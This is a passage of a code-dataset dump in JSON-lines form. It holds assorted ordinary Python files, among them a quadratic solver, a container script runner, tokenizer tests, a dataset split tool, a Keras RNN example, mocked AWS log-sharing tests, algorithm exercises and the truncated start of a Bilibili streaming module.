0, 1, 0]\n\n# Problem 2\n\n\"\"\"\n    This shuffle function is heavily biased in favour of the sorted position of the list.\n    \n    I.e. On average, the element `0` is likely to be found close to the front of the list,\n    while the greatest item is likely to be found to the end of the list.\n\"\"\"\n","sub_path":"Assessment/4th March.py","file_name":"4th March.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"599620094","text":"import cmath\n\nprint(\"ax**2+bx+c=0\")\na = int(input(\"enter the value a: \"))\nb = int(input(\"enter the value b: \"))\nc = int(input(\"enter the value c: \"))\n\n# discriminant D = b**2 - 4ac (b**2 means b squared)\nd = (b**2)-(4*a*c)\n\n# note the parentheses around (2*a): writing /2*a would divide by 2 and then multiply by a\nsol1 = (-b + cmath.sqrt(d))/(2*a) # cmath.sqrt is the square root\nsol2 = (-b - cmath.sqrt(d))/(2*a)\n\nif d > 0:\n    print(\" two distinct real roots \")\nelif d == 0:\n    print(\"two equal real roots\")\nelif d < 0:\n    print(\" two complex roots \")\nprint(\"solution_1 : %s , solution_2 : %s \" % (sol1, sol2))\n","sub_path":"quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"469256368","text":"from abc import abstractmethod\nimport json\nimport os\nimport shutil\nfrom typing import List, Union, cast\nimport tarfile\n\nfrom numpy import source\nfrom .dockerimage import DockerImage, RemoteDockerImage\nfrom ._bindmount import BindMount\n\ndef run_scriptdir_in_container(*,\n                               scriptdir: str,\n                               image_name: str,\n                               bind_mounts_path: str,\n                               output_dir: str,\n                               nvidia_support: bool\n):\n    with open(bind_mounts_path, 'r') as f:\n        x = json.load(f)\n    bind_mounts = [BindMount.deserialize(a) for a in x]\n    \n    run_scriptdir_in_container_2(scriptdir=scriptdir, image_name=image_name, bind_mounts=bind_mounts, output_dir=output_dir, nvidia_support=nvidia_support)\n\ndef run_scriptdir_in_container_2(*,\n                                 scriptdir: str,\n                                 image_name: str,\n                                 bind_mounts: List[BindMount],\n                                 output_dir: str,\n                                 
nvidia_support: bool\n):\n import kachery_client as kc\n\n run_path = f'{scriptdir}/run'\n env_path = f'{scriptdir}/env'\n input_dir = f'{scriptdir}/input'\n\n remove = False if os.getenv('HITHER_CONTAINER_DEBUG', None) in ['TRUE', '1'] else True\n with kc.TemporaryDirectory(remove=remove) as tmpdir:\n # entrypoint script to run inside the container\n entry_sh_script = f'''\n #!/bin/bash\n\n set -e\n\n # do not buffer the stdout\n export PYTHONUNBUFFERED=1\n\n export HITHER_RUNNING_FILE=/running/running.txt\n\n mkdir -p /working/output\n echo \"dummy\" > /working/output/dummy\n cd /working\n source ./env\n exec ./run\n '''\n entry_sh_path = tmpdir + '/entry.sh'\n kc.ShellScript(entry_sh_script).write(entry_sh_path)\n\n ##############################################\n all_bind_mounts: List[BindMount] = [\n BindMount(target='/hither-entry.sh', source=entry_sh_path, read_only=True),\n BindMount(target='/working/run', source=run_path, read_only=True),\n BindMount(target='/working/env', source=env_path, read_only=True)\n ]\n for bm in bind_mounts:\n all_bind_mounts.append(bm)\n \n running_dir = tmpdir + '/running'\n os.mkdir(running_dir)\n with open(running_dir + '/running.txt', 'w') as f:\n f.write('Process will end when this file is deleted')\n all_bind_mounts.append(BindMount(target='/running', source=running_dir, read_only=False))\n \n use_singularity = os.getenv('HITHER_USE_SINGULARITY', None)\n if use_singularity in [None, 'FALSE', '0']:\n _run_script_in_container_docker(\n all_bind_mounts=all_bind_mounts,\n image_name=image_name,\n input_dir=input_dir,\n output_dir=output_dir,\n tmpdir=tmpdir,\n script_path='/hither-entry.sh'\n )\n elif use_singularity in ['TRUE', '1']:\n _run_script_in_container_singularity(\n all_bind_mounts=all_bind_mounts,\n image_name=image_name,\n input_dir=input_dir,\n output_dir=output_dir,\n tmpdir=tmpdir,\n script_path='/hither-entry.sh',\n nvidia_support=nvidia_support\n )\n else:\n raise Exception('Unexpected value of HITHER_USE_SINGULARITY environment variable')\n\ndef _run_script_in_container_docker(*,\n all_bind_mounts: List[BindMount],\n image_name: str,\n input_dir: Union[str, None], # corresponds to /input in the container\n output_dir: Union[str, None], # corresponds to /output in the container\n tmpdir: str,\n script_path: str # path of script inside the container\n):\n import docker\n from docker.types import Mount\n from docker.models.containers import Container\n\n client = docker.from_env()\n\n # create the mounts\n mounts = [\n Mount(target=x.target, source=x.source, type='bind', read_only=x.read_only)\n for x in all_bind_mounts\n ]\n\n # create the container\n container = cast(Container, client.containers.create(\n image_name,\n [script_path],\n mounts=mounts,\n network_mode='host'\n ))\n\n # copy input directory to /working/input\n if input_dir:\n input_tar_path = tmpdir + '/input.tar.gz'\n with tarfile.open(input_tar_path, 'w:gz') as tar:\n tar.add(input_dir, arcname='input')\n with open(input_tar_path, 'rb') as tarf:\n container.put_archive('/working/', tarf)\n\n # run the container\n container.start()\n logs = container.logs(stream=True)\n for a in logs:\n for b in a.split(b'\\n'):\n if b:\n print(b.decode())\n \n # copy output from /working/output\n if output_dir:\n strm, st = container.get_archive(path='/working/output/')\n output_tar_path = tmpdir + '/output.tar.gz'\n with open(output_tar_path, 'wb') as f:\n for d in strm:\n f.write(d)\n with tarfile.open(output_tar_path) as tar:\n tar.extractall(tmpdir)\n for fname in os.listdir(tmpdir + 
'/output'):\n shutil.move(tmpdir + '/output/' + fname, output_dir + '/' + fname)\n \n container.remove()\n\ndef _run_script_in_container_singularity(*,\n all_bind_mounts: List[BindMount],\n image_name: str,\n input_dir: Union[str, None], # corresponds to /input in the container\n output_dir: Union[str, None], # corresponds to /output in the container\n tmpdir: str,\n script_path: str, # path of script inside the container\n nvidia_support: bool\n):\n import kachery_client as kc\n\n bind_opts = ' '.join([\n f'--bind {bm.source}:{bm.target}'\n for bm in all_bind_mounts\n ])\n\n nv_opts = '--nv' if nvidia_support else ''\n\n ss = kc.ShellScript(f'''\n #!/bin/bash\n\n # we really should have the -C option here, but it seems to be causing trouble\n singularity exec \\\\\n {bind_opts} {nv_opts} \\\\\n --bind {input_dir}:/working/input \\\\\n --bind {output_dir}:/working/output \\\\\n docker://{image_name} \\\\\n {script_path}\n ''')\n ss.start()\n ss.wait()","sub_path":"hither2/run_scriptdir_in_container.py","file_name":"run_scriptdir_in_container.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469668307","text":"# Copyright 2018 The HuggingFace Inc. team.\n# Copyright 2019 Guillaume Becquin\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport tempfile\nfrom pathlib import Path\nimport pytest\nfrom transformers.data.processors.glue import QnliProcessor\nfrom transformers.file_utils import get_from_cache\nfrom transformers.tokenization_bert import BertTokenizer\nfrom transformers.tokenization_distilbert import DistilBertTokenizer\nfrom rust_tokenizers import PyBertTokenizer\nimport os\n\n\n@pytest.mark.slow\nclass TestTokenizationSST2:\n def setup_class(self):\n self.processor = QnliProcessor()\n # Note: these tests do not download automatically test datasets. 
Please download them manually and update your\n # environment variables accordingly\n self.examples = self.processor.get_train_examples(os.environ[\"QNLI_PATH\"])\n self.test_dir = Path(tempfile.mkdtemp())\n\n def test_tokenization_bert(self):\n # Given\n self.base_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True,\n cache_dir=self.test_dir)\n self.rust_tokenizer = PyBertTokenizer(\n get_from_cache(self.base_tokenizer.pretrained_vocab_files_map['vocab_file']['bert-base-uncased']),\n do_lower_case=True)\n output_baseline = []\n for example in self.examples:\n output_baseline.append(self.base_tokenizer.encode_plus(example.text_a,\n text_pair=example.text_b,\n add_special_tokens=True,\n return_overflowing_tokens=True,\n return_special_tokens_mask=True,\n max_length=128))\n\n # When\n output_rust = self.rust_tokenizer.encode_pair_list(\n [(example.text_a, example.text_b) for example in self.examples],\n max_len=128,\n truncation_strategy='longest_first',\n stride=0)\n\n # Then\n for rust, baseline in zip(output_rust, output_baseline):\n assert (rust.token_ids == baseline['input_ids'])\n assert (rust.segment_ids == baseline['token_type_ids'])\n assert (rust.special_tokens_mask == baseline['special_tokens_mask'])\n\n def test_tokenization_distilbert(self):\n # Given\n self.base_tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased', do_lower_case=True,\n cache_dir=self.test_dir)\n self.rust_tokenizer = PyBertTokenizer(\n get_from_cache(self.base_tokenizer.pretrained_vocab_files_map['vocab_file']['distilbert-base-uncased']),\n do_lower_case=True)\n output_baseline = []\n for example in self.examples:\n output_baseline.append(self.base_tokenizer.encode_plus(example.text_a,\n text_pair=example.text_b,\n add_special_tokens=True,\n return_overflowing_tokens=True,\n return_special_tokens_mask=True,\n max_length=128))\n\n # When\n output_rust = self.rust_tokenizer.encode_pair_list(\n [(example.text_a, example.text_b) for example in self.examples],\n max_len=128,\n truncation_strategy='longest_first',\n stride=0)\n\n # Then\n for rust, baseline in zip(output_rust, output_baseline):\n assert (rust.token_ids == baseline['input_ids'])\n assert (rust.segment_ids == baseline['token_type_ids'])\n assert (rust.special_tokens_mask == baseline['special_tokens_mask'])\n","sub_path":"python-bindings/tests/test_tokenization_qnli.py","file_name":"test_tokenization_qnli.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34151406","text":"import random\nimport shutil\nfrom pathlib import Path\nimport argparse\n\n\ndef _path(_dir):\n path_obj = Path(_dir)\n\n if not path_obj.exists():\n path_obj.mkdir(parents=True, exist_ok=True)\n if path_obj.is_dir():\n return path_obj\n else:\n raise argparse.ArgumentTypeError(\"Not a directory\")\n\n\ndef args_parser():\n parser = argparse.ArgumentParser(\"split training data to train and validate\")\n parser.add_argument(\"-d\", \"--data_dir\", help=\"folder contain train images and training labels\", type=_path)\n parser.add_argument(\"-s\", \"--seed\", help=\"random seed for train val split\", default=1, type=float)\n parser.add_argument(\"-r\", \"--ratio\", help=\"validate ratio for train val split\", default=0.05, type=float)\n parser.add_argument(\"-o\", \"--out_dir\", help=\"output directory for train and validate data\", type=_path)\n _args, _ = parser.parse_known_args()\n return _args\n\n\ndef _mk_dir(out_path):\n \"\"\"\n 
Make training and validate directory to store data in PASCOL format\n :param out_path: _path obj\n :return: list contain train_img, train_label, val_img, val_label\n \"\"\"\n train_img = out_path.joinpath(\"train\", \"image\")\n train_label = out_path.joinpath(\"train\", \"label\")\n val_img = out_path.joinpath(\"validate\", \"image\")\n val_label = out_path.joinpath(\"validate\", \"label\")\n\n _dirs = [train_img, train_label, val_img, val_label]\n for d in _dirs:\n if not d.exists():\n d.mkdir(parents=True, exist_ok=False)\n return _dirs\n\n\ndef train_val_split(data_path):\n \"\"\"\n Main function to split training data\n :param data_path: str\n :return: train dict and val dict containing images and labels file name\n \"\"\"\n data_path = Path(data_path)\n imgs = sorted(list(data_path.rglob(\"*.jpg\")))\n labels = sorted(list(data_path.rglob(\"*.xml\")))\n print(\"Images: %s\" % len(imgs))\n assert len(imgs) == len(labels)\n\n data = dict(zip(imgs, labels))\n keys = list(data.keys())\n random.shuffle(keys)\n data_shuffled = {}\n data_shuffled.update({k: data[k] for k in keys})\n\n train_dic = {}\n val_dic = {}\n threshold = int(len(imgs) * (1 - args.ratio))\n for i, (k, v) in enumerate(data_shuffled.items()):\n if i <= threshold:\n train_dic.update({k: v})\n else:\n val_dic.update({k: v})\n\n return train_dic, val_dic\n\n\ndef main():\n train_dic, val_dic = train_val_split(data_path=args.data_dir)\n dirs = _mk_dir(out_path=args.out_dir)\n\n for im, l in train_dic.items():\n shutil.copy(im, dirs[0].joinpath(im.parts[-1]))\n shutil.copy(l, dirs[1].joinpath(l.parts[-1]))\n for im, l in val_dic.items():\n shutil.copy(im, dirs[2].joinpath(im.parts[-1]))\n shutil.copy(l, dirs[3].joinpath(l.parts[-1]))\n\n print(\"Success: %s:\" % args.out_dir)\n print(\"Train %s:\" % len(train_dic))\n print(\"Validate %s:\" % len(val_dic))\n return None\n\n\nif __name__ == \"__main__\":\n args = args_parser()\n random.seed(args.seed)\n main()\n","sub_path":"tools/train_val_split.py","file_name":"train_val_split.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"551548334","text":"#!/usr/bin/env python\n\nfrom MRChem import MrchemOut\nimport glob\nimport sys\nimport pandas as pd\n\n# Get all relevant output files in a list\nfiles = glob.glob(\"*_*_*_*.out\")\nerror_files = filter(lambda f: not MrchemOut(f).normaltermination(), files)\n# Get rid of extension\nfilenames = map(lambda x: x.split(\".\")[0], files)\n\n#Test if all jobs terminated normally\nassert len(error_files) == 0, \"Error! 
These {} job(s) did not terminate normally: {}\".format(len(error_files), ' '.join([MrchemOut(f).filename for f in files if not MrchemOut(f).normaltermination()]))\n\nprint(\"All jobs terminated normally\")\n\n# now we construct the dict and fill with information from filenames\n# this dict will contain the raw data for each calculation\nrawdata = {}\nrawdata[\"molecule\"] = [f.split(\"_\")[0] for f in filenames]\nrawdata[\"functional\"] = [f.split(\"_\")[1] for f in filenames]\nrawdata[\"field\"] = [f.split(\"_\")[3] for f in filenames]\nrawdata[\"direction\"] = [f.split(\"_\")[4] for f in filenames]\nrawdata[\"energy\"] = []\nrawdata[\"dipole\"] = []\nrawdata[\"filename\"] = []\nrawdata[\"precision\"] = []\n\n# now collect the energies, dipoles, filenames, and precisions from output \n# and add them to the dict\nfor f in files:\n output = MrchemOut(f)\n rawdata[\"energy\"].append(output.final_energy_pot())\n rawdata[\"dipole\"].append(output.dipole_vector())\n rawdata[\"filename\"].append(output.filename)\n rawdata[\"precision\"].append(output.precision())\n \n# now write raw data to CSV file using a useful pandas command\npd.DataFrame(rawdata).to_csv(\"rawdata.csv\")\n\n\n# We will need a function that converts a string into a float. Example: \"00025\" -> 0.0025\ndef decimal(s):\n return s[0:1] + \".\" + s[1:]\n\n# now collect the jobs on same molecule with same functional at same precision, but with fields of opposite signs\n# appending filenames and absolute value of field strength\ntriplet = []\nfor f in filter(lambda f: f.split(\"_\")[3] == \"-001\", files):\n for g in filter(lambda f: f.split(\"_\")[3] == \"+001\", files):\n if f.split(\"_\")[0] == g.split(\"_\")[0] and f.split(\"_\")[1] == g.split(\"_\")[1] and f.split(\"_\")[2] == g.split(\"_\")[2] and f.split(\"_\")[4] == g.split(\"_\")[4]:\n triplet.append([f, g, decimal(f.split(\"_\")[3][1:])])\n\nfor i, trip in enumerate([el for trip in triplet for el in trip if \"+\" in el]):\n triplet[i].append(trip.split(\"_\")[0])\n triplet[i].append(trip.split(\"_\")[1])\n triplet[i].append(str(MrchemOut(trip).precision()))\n triplet[i].append(trip.split(\"_\")[4].split(\".\")[0])\n\n# first unzip the sorted list (the order has been triple checked)\nminus, plus, field, mol, func, prec, direction = (zip(*sorted(triplet)))\n\n# then map the energy/diple moment to the list, and convert to string\n#plus = map(str, map(lambda f: MrchemOut(f).dipole_au(), plus))\n#minus = map(str, map(lambda f: MrchemOut(f).dipole_au(), minus))\n\n# First comvert tuple to list\nplus = [x for x in plus]\nminus = [x for x in minus]\n\n# Now replace filename with the correct dipole component\nfor i, f in enumerate(plus):\n if \"x\" in f:\n plus[i] = str(MrchemOut(f).dipole_vector()[0])\n elif \"y\" in f:\n plus[i] = str(MrchemOut(f).dipole_vector()[1])\n elif \"z\" in f:\n plus[i] = str(MrchemOut(f).dipole_vector()[2])\nfor i, f in enumerate(minus):\n if \"x\" in f:\n minus[i] = str(MrchemOut(f).dipole_vector()[0])\n elif \"y\" in f:\n minus[i] = str(MrchemOut(f).dipole_vector()[1])\n elif \"z\" in f:\n minus[i] = str(MrchemOut(f).dipole_vector()[2])\n\n# then zip back\ntriplet = zip(mol, func, prec, field, direction, plus, minus)\n\n# now insert header\ntriplet.insert(0, (\"molecule\", \"functional\", \"precision\", \"field_strength\", \"direction\", \"u+\", \"u-\"))\n\n# finally print to terminal in a format easily copied to Excel\nfor i in triplet:\n print(' 
'.join(i))\n\n\n\n","sub_path":"mrchem_pol_analysis.py","file_name":"mrchem_pol_analysis.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"167472375","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, SimpleRNN\n\n#1. data\nx = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6]])\ny = np.array([4,5,6,7])\n\nprint(x.shape, y.shape) # (4, 3) (4,)\n\nx = x.reshape(4, 3, 1) # (bacth_size, timesteps, feature) \n\n#2. model\nmodel = Sequential()\nmodel.add(SimpleRNN(units=10, activation='relu', input_shape=(3,1))) # units = output, 행무시이기때문에 (3,1)\nmodel.add(SimpleRNN(10, activation='relu', input_length=3, input_dim=1))\n # timesteps feature\nmodel.add(Dense(9, activation='relu'))\nmodel.add(Dense(1))\n\nmodel.summary()\n\n\n#3. compile, fit\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(x, y, epochs=1000, batch_size=1)\n\n#4. evaluate, predict\nx_input = np.array([5,6,7]).reshape(1,3,1)\nresults = model.predict(x_input)\nprint(results) \n\n\n# epochs=1000 : [[8.009891]]\n","sub_path":"keras/keras34_RNN2.py","file_name":"keras34_RNN2.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"42850720","text":"# Copyright 2017 Bracket Computing, Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# https://github.com/brkt/brkt-cli/blob/master/LICENSE\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport brkt_cli\nfrom brkt_cli.aws import share_logs, boto3_device\nfrom brkt_cli.aws.model import Instance, Snapshot\n\n\nclass EC2():\n\n def Instance(self, instance_id):\n instance = Instance()\n instance.id = instance_id\n instance.public_dns_name = 'test-name'\n instance.state = 'running'\n return instance\n\n\nclass EC2Client():\n\n def delete_key_pair(self, KeyName):\n return\n\n def create_key_pair(self, KeyName):\n return {'KeyMaterial': 123}\n\n def run_instances(self, ImageId, MinCount, MaxCount, InstanceType,\n BlockDeviceMappings, UserData, EbsOptimized,\n SubnetId, KeyName):\n instance = {'Instances': [{'InstanceId': 'test-id'}]}\n\n return instance\n\n\n# This class is used for testing ShareLogs\nclass ShareLogsTestService(share_logs.ShareLogsService):\n\n def __init__(self):\n self.ec2client = EC2Client()\n self.ec2 = EC2()\n\n def get_instance(self, instance_id):\n instance = Instance()\n instance.state['Name'] = 'running'\n instance.root_device_name = '/dev/sda1'\n instance.id = 'test-id'\n\n dev = boto3_device.make_device(\n device_name='/dev/sda1',\n volume_id='vol-1'\n )\n instance.block_device_mappings = [dev]\n return instance\n\n def create_snapshot(self, volume_id, name):\n snapshot = Snapshot()\n snapshot.id = 'test-id'\n snapshot.volume_size = '5'\n return snapshot\n\n def get_snapshots(self, snapshot_id):\n snapshot = Snapshot()\n snapshot.state = 'completed'\n return [snapshot]\n\n def get_snapshot(self, snapshot_id):\n snapshot = Snapshot()\n snapshot.state = 'completed'\n return snapshot\n\n def wait_file(self, ip, logs_file, dest, key, path,\n bast_key=None, bast_user=None, bast_ip=None):\n return\n\n\nclass TestShareLogs(unittest.TestCase):\n\n def setUp(self):\n brkt_cli.util.SLEEP_ENABLED = False\n\n def test_with_instance_id(self):\n aws_svc = ShareLogsTestService()\n logs_svc = ShareLogsTestService()\n instance_id = 'test-instance'\n snapshot_id = None\n region = 'us-west-2'\n destination = \"./logs.tar.gz\"\n\n share_logs.share(aws_svc, logs_svc, instance_id=instance_id,\n snapshot_id=snapshot_id, region=region, dest=destination,\n subnet_id=None, bast_key=None, bast_user=None, bast_ip=None)\n\n def test_with_snapshot_id(self):\n aws_svc = ShareLogsTestService()\n logs_svc = ShareLogsTestService()\n instance_id = None\n snapshot_id = 'test-snapshot'\n region = 'us-west-2'\n destination = \"./logs.tar.gz\"\n\n share_logs.share(aws_svc, logs_svc, instance_id=instance_id,\n snapshot_id=snapshot_id, region=region, dest=destination,\n subnet_id=None, bast_key=None, bast_user=None, bast_ip=None)\n","sub_path":"brkt_cli/aws/test_share_logs.py","file_name":"test_share_logs.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"421073192","text":"'''\nGiven an array A of non-negative integers, \nreturn the maximum sum of elements in two non-overlapping (contiguous) subarrays, which have lengths L and M. \n(For clarification, the L-length subarray could occur before or after the M-length subarray.)\nFormally, return the largest V for which V = (A[i] + A[i+1] + ... + A[i+L-1]) + (A[j] + A[j+1] + ... 
+ A[j+M-1]) and either:\n0 <= i < i + L - 1 < j < j + M - 1 < A.length, or\n0 <= j < j + M - 1 < i < i + L - 1 < A.length.\n \nExample 1:\nInput: A = [0,6,5,2,2,5,1,9,4], L = 1, M = 2\nOutput: 20\nExplanation: One choice of subarrays is [9] with length 1, and [6,5] with length 2.\n\nExample 2:\nInput: A = [3,8,1,3,2,1,8,9,0], L = 3, M = 2\nOutput: 29\nExplanation: One choice of subarrays is [3,8,1] with length 3, and [8,9] with length 2.\n\nExample 3:\nInput: A = [2,1,5,6,0,9,5,0,3,8], L = 4, M = 3\nOutput: 31\nExplanation: One choice of subarrays is [5,6,0,9] with length 4, and [3,8] with length 3.\n \nNote:\nL >= 1\nM >= 1\nL + M <= A.length <= 1000\n0 <= A[i] <= 1000\n'''\n\nclass Solution:\n def maxSumTwoNoOverlap(self, A: List[int], L: int, M: int) -> int:\n for i in range(1, len(A)):\n A[i] += A[i-1]\n ans = A[L+M-1];\n Lmax=A[L-1] # running max of L sequence\n Mmax=A[M-1] # running max of M sequence\n for i in range(L+M, len(A)):\n Lmax = max(Lmax, A[i-M]-A[i-L-M])\n Mmax = max(Mmax, A[i-L]-A[i-L-M])\n ans=max(ans, Lmax+A[i]-A[i-M])\n ans=max(ans, Mmax+A[i]-A[i-L])\n return ans\n \n#solution 2\nclass Solution:\n def maxSumTwoNoOverlap(self, A: List[int], L: int, M: int) -> int:\n def solve(l,m):\n left = p = sum(A[:l]) \n c = sum(A[l:l+m])\n ans = left + c\n for i in range(l, len(A) - m):\n p += A[i] - A[i-l]\n c += A[i+m] - A[i]\n left = max(left, p)\n ans = max(c + left, ans) \n return ans \n return max(solve(L,M), solve(M, L))\n \n","sub_path":"Python/1031. Maximum Sum of Two Non-Overlapping Subarrays.py","file_name":"1031. Maximum Sum of Two Non-Overlapping Subarrays.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"123071265","text":"'''\r\nModule: Plotter\r\nPurpose: This module is to plot and display values onto a graphical console window\r\n\r\nCreated on Oct 21, 2017\r\n@author: Joey S. 
Amalei\r\n\r\nCS431-01\r\nFall 2017\r\n'''\r\n\r\n\"\"\"\r\nImport PyPlot Package from Python to graph\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\"\"\"\r\nDefine Functions to use for Plotter Module\r\n\"\"\"\r\ndef setGraphLabels(graphTitle, xLabel, yLabel):\r\n \"\"\"\r\n Assign lables on the graphical window\r\n figsize is shown using inches for graphical window size\r\n \"\"\"\r\n plt.figure(figsize=(10, 5))\r\n plt.title(graphTitle)\r\n plt.xlabel(xLabel)\r\n plt.ylabel(yLabel)\r\n\r\ndef drawGraph(rawData, linearRegressionData, numOfMonths): \r\n \"\"\"\r\n Fill values to the x list to be used as our X-Axis tick mark labels\r\n \"\"\"\r\n x = []\r\n for i in range (numOfMonths):\r\n x.append(i)\r\n \r\n \"\"\"\r\n Plot x and y values onto graph\r\n \"\"\"\r\n # Graph function for rawData values\r\n # Argument c - changes the color of the scatter dot graph\r\n plt.scatter(x, rawData, c=\"r\")\r\n # Graph function for linearRegressionData values\r\n # Argument c - changes the color of the line graph\r\n plt.plot(x, linearRegressionData, c=\"b\")\r\n \r\n \"\"\"\r\n Graph and display graphical values onto console window\r\n \"\"\"\r\n plt.show()","sub_path":"Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"543968477","text":"from collections import defaultdict\n\nclass Graph:\n def __init__(self):\n self.graph = dict()\n\n def add(self,u,v):\n if u in self.graph:\n self.graph[u].append(v)\n else:\n self.graph[u] = [v]\n\n\ndef dfs(g, k,clr, fvst, lvst,edg, dfsl):\n #global clr, fvst, lvst, t, edg, dfsl\n dfsl.append(k)\n dfs.t += 1\n fvst[k] = dfs.t\n clr[k] = 'g'\n\n if k in g:\n for av in g[k]:\n if clr[av] == 'w':\n\n dfs(g, av, clr, fvst, lvst, edg, dfsl)\n elif clr[av] == 'g':\n edg['bck'].append((k, av))\n elif clr[av] == 'b':\n edg['crs'].append((k, av))\n\n clr[k] = 'b'\n dfs.t += 1\n lvst[k] = dfs.t\n\n\n\ndef Dfs(g):\n #global clr, fvst, lvst, t\n clr = {}\n fvst = {}\n lvst = {}\n dfs.t = 0\n dfsl = []\n edg = {'bck': [], 'crs': []}\n\n for v, adjv in g.items():\n clr[v] = 'w'\n fvst[v] = 0\n lvst[v] = 0\n for av in adjv:\n clr[av] = 'w'\n fvst[av] = 0\n lvst[av] = 0\n for cn in g:\n if clr[cn] == 'w':\n dfs(g, cn,clr,fvst,lvst,edg,dfsl)\n\n for k, v in edg.items():\n print(k, v)\n\n for v in dfsl:\n print('vrtx', v, 'first vst-->', fvst[v], 'last vst-->', lvst[v])\n\n if len(edg['bck'])>=1:\n return True\n else:\n return False\n\n\n\n\n\nif __name__ == '__main__':\n T = int(input())\n\n for _ in range(T):\n g = Graph()\n\n V, E = [int(x) for x in input().split()]\n\n for i in range(E):\n u,v=[int(x) for x in input().split()]\n g.add(u,v)\n\n Dfs(g.graph)\n\n\n\n'''\ni/p-: input to be copy and paste to console prompt\n2\n6 8\n1 2\n1 4\n2 3\n3 4\n4 2\n5 3\n5 6\n6 6\n8 12\n1 2\n1 3\n1 6\n2 5\n3 4\n4 1\n4 8\n5 6\n5 7\n5 8\n6 2\n6 7\n\n####################################\ntest_cases 1, detail clrs book\n\nfigure 22.4\ninput\n6 8\n1 2\n1 4\n2 3\n3 4\n4 2\n5 3\n5 6\n6 6\n\noutput\nbck [(4, 2), (6, 6)]\ncrs [(1, 4), (5, 3)]\nvrtx 1 first vst--> 1 last vst--> 8\nvrtx 2 first vst--> 2 last vst--> 7\nvrtx 3 first vst--> 3 last vst--> 6\nvrtx 4 first vst--> 4 last vst--> 5\nvrtx 5 first vst--> 9 last vst--> 12\nvrtx 6 first vst--> 10 last vst--> 11\n\n\n##################\ntcs 2\n\ninput\n8 12\n1 2\n1 3\n1 6\n2 5\n3 4\n4 1\n4 8\n5 6\n5 7\n5 8\n6 2\n6 7\n\noutput\nbck [(6, 2), (4, 1)]\ncrs [(5, 7), (4, 8), (1, 6)]\nvrtx 1 first vst--> 1 last 
vst--> 16\nvrtx 2 first vst--> 2 last vst--> 11\nvrtx 5 first vst--> 3 last vst--> 10\nvrtx 6 first vst--> 4 last vst--> 7\nvrtx 7 first vst--> 5 last vst--> 6\nvrtx 8 first vst--> 8 last vst--> 9\nvrtx 3 first vst--> 12 last vst--> 15\nvrtx 4 first vst--> 13 last vst--> 14\n'''","sub_path":"graph/edge type back,cross.py","file_name":"edge type back,cross.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"502062780","text":"import Main\nfrom Player import Player\n\n# backpack issue\n\nclass Main:\n def __init__(self):\n print(\"init\")\n\n # random data\n\n\n print(self.playerList)\n\n def get_data(self):\n player1 = Player(1, 'yaochen', 8, 7);\n player2 = Player(2, 'xiaolin', 9, 5);\n player3 = Player(3, 'haoyang', 6, 7);\n player4 = Player(4, 'jiahao', 7, 8);\n player5 = Player(5, 'chengkun', 11, 10);\n player6 = Player(6, 'ziye', 7, 11);\n self.playerList = [player1, player2, player3, player4, player5, player6];\n\n def process(self):\n print(\"process\")\n\n\nif __name__ == \"__main__\":\n main = Main()\n main.process()\n\n# https://www.cnblogs.com/William-xh/p/7305877.html","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466727184","text":"from bilibiliProxy import BilibiliProxy\nfrom subprocessOp import _forwardStream_sync, _getYotube_m3u8_sync\nimport utitls\nimport time\nimport traceback\nimport os\nimport signal\n\nimport questInfo\n\ndef bilibiliStartLive(channelId, room_title, area_id=None):\n curSub = utitls.getSubInfoWithSubChannelId(channelId)\n curBiliAccCookie = curSub['bilibili_cookiesStr']\n\n tmp_area_id = area_id\n if tmp_area_id == None:\n tmp_area_id = curSub['bilibili_areaid']\n\n b = BilibiliProxy(curBiliAccCookie)\n t_room_id = b.getLiveRoomId()\n # 